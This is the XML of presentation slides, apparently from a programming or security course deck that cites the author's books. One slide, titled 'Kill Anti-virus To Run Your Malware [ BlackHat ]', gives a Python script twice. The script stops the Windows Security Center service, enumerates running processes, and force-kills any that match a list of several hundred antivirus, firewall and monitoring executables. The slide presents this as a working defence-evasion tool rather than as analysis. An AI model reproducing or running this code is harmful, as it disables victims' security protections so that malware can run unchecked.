                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, Springer, 2024, pp. 1-245.</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Coding Examples from Simple to Complex - Applications in Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, Springer, 2024, pp. 1-240.</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Markov chains: from theory to implementation and experimentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>. Hoboken, NJ,  John Wiley &amp; Sons, USA, 2017, ISBN: 978-1-119-38755-8.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7866610" y="2687191"/>
            <a:ext cx="2678297"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65000"/>
                    <a:lumOff val="35000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>https://github.com/gagniuc</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50735" y="3970542"/>
            <a:ext cx="5110048" cy="2728962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="sq">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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440471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6992" y="179249"/>
            <a:ext cx="5922264" cy="859536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kill Anti-virus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316992" y="1056404"/>
            <a:ext cx="6504432" cy="3790333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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import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os</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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print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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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Kill Anti-virus To Run Your Malware [ BlackHat ]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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os</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popen</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"net stop \"Security Center\""</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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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avs</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'AAWTray.exe'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'Ad-Aware.exe'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'MSASCui.exe'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'cmd.exe'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'cmd32.exe'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'_avp32.exe'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'_avpcc.exe'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'_avpm.exe'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'aAvgApi.exe'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'ackwin32.exe'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'adaware.exe'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'advxdwin.exe'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'agentsvr.exe'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'wupdater.exe'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'wupdt.exe'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'wyvernworksfirewall.exe'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'xpf202en.exe'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'zapro.exe'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'zapsetup3001.exe'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'zatutor.exe'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'zonalm2601.exe'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'zonealarm.exe'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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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processes</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os</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popen</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'TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "="'</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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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ps</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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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for</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in</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processes</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split</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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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if</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".exe"</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in</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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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ps</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append</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replace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"K\n"</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replace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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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print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Killing Antivirus services on this pc"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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for</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av</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in</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avs</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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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for</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in</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ps</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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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if</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av</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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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print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killing off "</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av</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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os</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popen</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"TASKKILL /F /IM \"{}\""</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format</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solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6821424" y="179249"/>
            <a:ext cx="5148072" cy="6678751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5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import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os</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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os</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popen</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"net stop \"Security Center\""</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500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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avs</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'AAWTray.exe'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'Ad-Aware.exe'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'MSASCui.exe'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'cmd.exe'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'cmd32.exe'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'_avp32.exe'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'_avpcc.exe'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'_avpm.exe'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'aAvgApi.exe'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'ackwin32.exe'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'adaware.exe'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'advxdwin.exe'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'agentsvr.exe'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'agentw.exe'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'alertsvc.exe'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'alevir.exe'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'alogserv.exe'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'amon9x.exe'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'anti-trojan.exe'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'antivirus.exe'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'ants.exe'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'apimonitor.exe'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'aplica32.exe'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'apvxdwin.exe'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'arr.exe'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'atcon.exe'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'atguard.exe'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'atro55en.exe'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'atupdater.exe'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'atwatch.exe'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'au.exe'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'aupdate.exe'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'auto-protect.nav80try.exe'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'autodown.exe'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'autotrace.exe'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'autoupdate.exe'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'avconsol.exe'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'ave32.exe'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'avgcc32.exe'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'avgctrl.exe'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'avgemc.exe'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'avgnt.exe'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'avgrsx.exe'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'avgserv.exe'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'avgserv9.exe'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'avguard.exe'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'avgw.exe'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'avkpop.exe'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'avkserv.exe'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'avkservice.exe'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'avkwctl9.exe'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'avltmain.exe'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'avnt.exe'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'avp32.exe'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'avpcc.exe'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'avpdos32.exe'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'avpm.exe'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'avptc32.exe'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'avpupd.exe'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'avsched32.exe'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'avsynmgr.exe'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'avwin.exe'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'avwin95.exe'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'avwinnt.exe'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'avwupd.exe'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'avwupd32.exe'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'avwupsrv.exe'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'avxmonitor9x.exe'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'avxmonitornt.exe'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'avxquar.exe'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'backweb.exe'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'bargains.exe'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'bd_professional.exe'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'beagle.exe'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'belt.exe'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'bidef.exe'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'bidserver.exe'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'bipcp.exe'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'bipcpevalsetup.exe'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'bisp.exe'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'blackd.exe'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'blackice.exe'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'blink.exe'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'blss.exe'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'bootconf.exe'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'bootwarn.exe'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'borg2.exe'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'bpc.exe'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'brasil.exe'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'bs120.exe'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'bundle.exe'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'bvt.exe'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'ccapp.exe'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'ccevtmgr.exe'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'ccpxysvc.exe'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'cdp.exe'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'cfd.exe'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'cfgwiz.exe'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'cfiadmin.exe'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'cfiaudit.exe'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'cfinet.exe'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'cfinet32.exe'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'claw95.exe'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'claw95cf.exe'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'clean.exe'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'cleaner.exe'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'cleaner3.exe'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'cleanpc.exe'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'click.exe'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'cmesys.exe'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'cmgrdian.exe'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'cmon016.exe'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'connectionmonitor.exe'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'cpd.exe'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'cpf9x206.exe'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'cpfnt206.exe'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'ctrl.exe'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'cv.exe'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'cwnb181.exe'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'cwntdwmo.exe'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'datemanager.exe'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'dcomx.exe'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'defalert.exe'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'defscangui.exe'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'defwatch.exe'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'deputy.exe'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'divx.exe'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'dllcache.exe'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'dllreg.exe'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'doors.exe'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'dpf.exe'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'dpfsetup.exe'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'dpps2.exe'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'drwatson.exe'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'drweb32.exe'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'drwebupw.exe'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'dssagent.exe'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'dvp95.exe'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'dvp95_0.exe'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'ecengine.exe'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'efpeadm.exe'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'emsw.exe'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'ent.exe'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'esafe.exe'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'escanhnt.exe'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'escanv95.exe'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'espwatch.exe'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'ethereal.exe'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'etrustcipe.exe'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'evpn.exe'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'exantivirus-cnet.exe'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'exe.avxw.exe'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'expert.exe'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'explore.exe'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'f-agnt95.exe'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'f-prot.exe'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'f-prot95.exe'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'f-stopw.exe'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'fameh32.exe'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'fast.exe'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'fch32.exe'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'fih32.exe'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'findviru.exe'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'firewall.exe'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'fnrb32.exe'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'fp-win.exe'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'fp-win_trial.exe'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'fprot.exe'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'frw.exe'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'fsaa.exe'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'fsav.exe'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'fsav32.exe'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'fsav530stbyb.exe'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'fsav530wtbyb.exe'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'fsav95.exe'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'fsgk32.exe'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'fsm32.exe'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'fsma32.exe'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'fsmb32.exe'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'gator.exe'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'gbmenu.exe'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'gbpoll.exe'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'generics.exe'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'gmt.exe'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'guard.exe'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'guarddog.exe'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'hacktracersetup.exe'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'hbinst.exe'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'hbsrv.exe'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'hotactio.exe'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'hotpatch.exe'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'htlog.exe'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'htpatch.exe'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'hwpe.exe'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'hxdl.exe'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'hxiul.exe'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'iamapp.exe'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'iamserv.exe'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'iamstats.exe'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'ibmasn.exe'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'ibmavsp.exe'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'icload95.exe'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'icloadnt.exe'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'icmon.exe'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'icsupp95.exe'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'icsuppnt.exe'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'idle.exe'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'iedll.exe'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'iedriver.exe'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'iexplorer.exe'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'iface.exe'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'ifw2000.exe'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'inetlnfo.exe'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'infus.exe'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'infwin.exe'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'init.exe'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'intdel.exe'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'intren.exe'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'iomon98.exe'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'istsvc.exe'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'jammer.exe'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'jdbgmrg.exe'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'jedi.exe'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'kavlite40eng.exe'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'kavpers40eng.exe'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'kavpf.exe'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'kazza.exe'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'keenvalue.exe'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'kerio-pf-213-en-win.exe'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'kerio-wrl-421-en-win.exe'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'kerio-wrp-421-en-win.exe'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'kernel32.exe'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'killprocesssetup161.exe'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'launcher.exe'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'ldnetmon.exe'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'ldpro.exe'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'ldpromenu.exe'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'ldscan.exe'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'lnetinfo.exe'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'loader.exe'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'localnet.exe'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'lockdown.exe'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'lockdown2000.exe'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'lookout.exe'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'lordpe.exe'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'lsetup.exe'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'luall.exe'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'luau.exe'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'lucomserver.exe'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'luinit.exe'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'luspt.exe'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'mapisvc32.exe'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'mcagent.exe'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'mcmnhdlr.exe'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'mcshield.exe'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'mctool.exe'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'mcupdate.exe'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'mcvsrte.exe'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'mcvsshld.exe'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'mfin32.exe'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'mfw2en.exe'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'mfweng3.02d30.exe'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'mgavrtcl.exe'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'mgavrte.exe'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'mghtml.exe'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'mgui.exe'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'minilog.exe'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'mmod.exe'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'monitor.exe'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'moolive.exe'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'mostat.exe'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'mpfagent.exe'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'mpfservice.exe'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'mpftray.exe'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'mrflux.exe'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'msapp.exe'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'msbb.exe'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'msblast.exe'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'mscache.exe'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'msccn32.exe'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'mscman.exe'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'msconfig.exe'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'msdm.exe'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'msdos.exe'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'msiexec16.exe'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'msinfo32.exe'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'mslaugh.exe'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'msmgt.exe'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'msmsgri32.exe'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'mssmmc32.exe'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'mssys.exe'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'msvxd.exe'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'mu0311ad.exe'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'mwatch.exe'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'n32scanw.exe'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'nav.exe'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'navap.navapsvc.exe'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'navapsvc.exe'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'navapw32.exe'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'navdx.exe'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'navlu32.exe'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'navnt.exe'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'navstub.exe'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'navw32.exe'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'navwnt.exe'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'nc2000.exe'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'ncinst4.exe'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'ndd32.exe'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'neomonitor.exe'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'neowatchlog.exe'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'netarmor.exe'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'netd32.exe'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'netinfo.exe'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'netmon.exe'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'netscanpro.exe'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'netspyhunter-1.2.exe'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'netstat.exe'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'netutils.exe'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'nisserv.exe'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'nisum.exe'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'nmain.exe'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'nod32.exe'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'normist.exe'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'norton_internet_secu_3.0_407.exe'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'notstart.exe'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'npf40_tw_98_nt_me_2k.exe'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'npfmessenger.exe'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'nprotect.exe'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'npscheck.exe'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'npssvc.exe'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'nsched32.exe'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'nssys32.exe'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'nstask32.exe'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'nsupdate.exe'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'ntrtscan.exe'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'ntvdm.exe'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'ntxconfig.exe'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'nui.exe'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'nupgrade.exe'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'nvarch16.exe'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'nvc95.exe'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'nvsvc32.exe'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'nwinst4.exe'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'nwservice.exe'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'nwtool16.exe'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'ollydbg.exe'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'onsrvr.exe'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'optimize.exe'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'ostronet.exe'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'otfix.exe'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'outpost.exe'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'outpostinstall.exe'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'outpostproinstall.exe'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'padmin.exe'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'panixk.exe'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'patch.exe'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'pavcl.exe'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'pavproxy.exe'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'pavsched.exe'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'pavw.exe'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'pccwin98.exe'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'pcfwallicon.exe'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'pcip10117_0.exe'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'pcscan.exe'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'pdsetup.exe'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'periscope.exe'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'persfw.exe'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'perswf.exe'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'pf2.exe'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'pfwadmin.exe'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'pgmonitr.exe'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'pingscan.exe'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'platin.exe'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'pop3trap.exe'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'poproxy.exe'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'popscan.exe'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'portdetective.exe'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'portmonitor.exe'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'powerscan.exe'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'ppinupdt.exe'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'pptbc.exe'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'ppvstop.exe'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'prizesurfer.exe'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'prmt.exe'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'prmvr.exe'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'procdump.exe'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'processmonitor.exe'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'procexplorerv1.0.exe'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'programauditor.exe'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'proport.exe'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'protectx.exe'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'pspf.exe'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'purge.exe'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'qconsole.exe'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'qserver.exe'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'rapapp.exe'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'rav7.exe'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'rav7win.exe'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'rav8win32eng.exe'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'ray.exe'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'rb32.exe'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'rcsync.exe'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'realmon.exe'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'reged.exe'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'regedit.exe'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'regedt32.exe'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'rescue.exe'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'rescue32.exe'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'rrguard.exe'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'rshell.exe'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'rtvscan.exe'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'rtvscn95.exe'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'rulaunch.exe'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'run32dll.exe'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'rundll.exe'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'rundll16.exe'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'ruxdll32.exe'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'safeweb.exe'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'sahagent.exe'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'save.exe'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'savenow.exe'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'sbserv.exe'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'sc.exe'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'scam32.exe'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'scan32.exe'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'scan95.exe'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'scanpm.exe'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'scrscan.exe'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'serv95.exe'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'setup_flowprotector_us.exe'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'setupvameeval.exe'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'sfc.exe'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'sgssfw32.exe'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'sh.exe'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'shellspyinstall.exe'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'shn.exe'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'showbehind.exe'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'smc.exe'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'sms.exe'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'smss32.exe'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'soap.exe'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'sofi.exe'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'sperm.exe'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'spf.exe'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'sphinx.exe'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'spoler.exe'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'spoolcv.exe'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'spoolsv32.exe'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'spyxx.exe'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'srexe.exe'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'srng.exe'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'ss3edit.exe'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'ssg_4104.exe'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'ssgrate.exe'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'st2.exe'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'start.exe'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'stcloader.exe'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'supftrl.exe'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'support.exe'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'supporter5.exe'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'svc.exe'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'svchostc.exe'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'svchosts.exe'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'svshost.exe'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'sweep95.exe'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'sweepnet.sweepsrv.sys.swnetsup.exe'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'symproxysvc.exe'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'symtray.exe'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'sysedit.exe'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'system.exe'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'system32.exe'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'sysupd.exe'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'taskmg.exe'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'taskmgr.exe'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'taskmo.exe'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'taskmon.exe'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'taumon.exe'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'tbscan.exe'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'tc.exe'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'tca.exe'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'tcm.exe'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'tds-3.exe'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'tds2-98.exe'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'tds2-nt.exe'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'teekids.exe'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'tfak.exe'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'tfak5.exe'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'tgbob.exe'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'titanin.exe'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'titaninxp.exe'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'tracert.exe'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'trickler.exe'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'trjscan.exe'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'trjsetup.exe'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'trojantrap3.exe'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'tsadbot.exe'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'tvmd.exe'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'tvtmd.exe'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'undoboot.exe'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'updat.exe'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'update.exe'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'upgrad.exe'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'utpost.exe'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'vbcmserv.exe'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'vbcons.exe'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'vbust.exe'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'vbwin9x.exe'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'vbwinntw.exe'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'vcsetup.exe'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'vet32.exe'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'vet95.exe'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'vettray.exe'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'vfsetup.exe'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'vir-help.exe'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'virusmdpersonalfirewall.exe'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'vnlan300.exe'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'vnpc3000.exe'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'vpc32.exe'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'vpc42.exe'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'vpfw30s.exe'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'vptray.exe'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'vscan40.exe'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'vscenu6.02d30.exe'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'vsched.exe'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'vsecomr.exe'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'vshwin32.exe'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'vsisetup.exe'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'vsmain.exe'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'vsmon.exe'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'vsstat.exe'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'vswin9xe.exe'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'vswinntse.exe'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'vswinperse.exe'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'w32dsm89.exe'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'w9x.exe'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'watchdog.exe'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'webdav.exe'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'webscanx.exe'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'webtrap.exe'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'wfindv32.exe'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'whoswatchingme.exe'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'wimmun32.exe'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'win-bugsfix.exe'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'win32.exe'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'win32us.exe'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'winactive.exe'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'window.exe'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'windows.exe'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'wininetd.exe'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'wininitx.exe'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'winlogin.exe'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'winmain.exe'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'winnet.exe'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'winppr32.exe'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'winrecon.exe'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'winservn.exe'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'winssk32.exe'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'winstart.exe'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'winstart001.exe'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'wintsk32.exe'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'winupdate.exe'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'wkufind.exe'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'wnad.exe'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'wnt.exe'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'wradmin.exe'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'wrctrl.exe'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'wsbgate.exe'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'wupdater.exe'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'wupdt.exe'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'wyvernworksfirewall.exe'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'xpf202en.exe'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'zapro.exe'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'zapsetup3001.exe'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'zatutor.exe'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'zonalm2601.exe'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'zonealarm.exe'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500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="500" i="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t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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processes</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os</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popen</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'TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "="'</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500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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ps</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500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5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for</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in</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processes</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split</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500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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if</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".exe"</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in</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500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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ps</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append</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replace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"K\n"</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replace</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500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5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print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Killing Antivirus services on this pc"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5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for</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av</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in</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avs</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500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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for</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in</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ps</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500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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if</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av</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500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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print</a:t>
            </a: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killing off "</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av</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
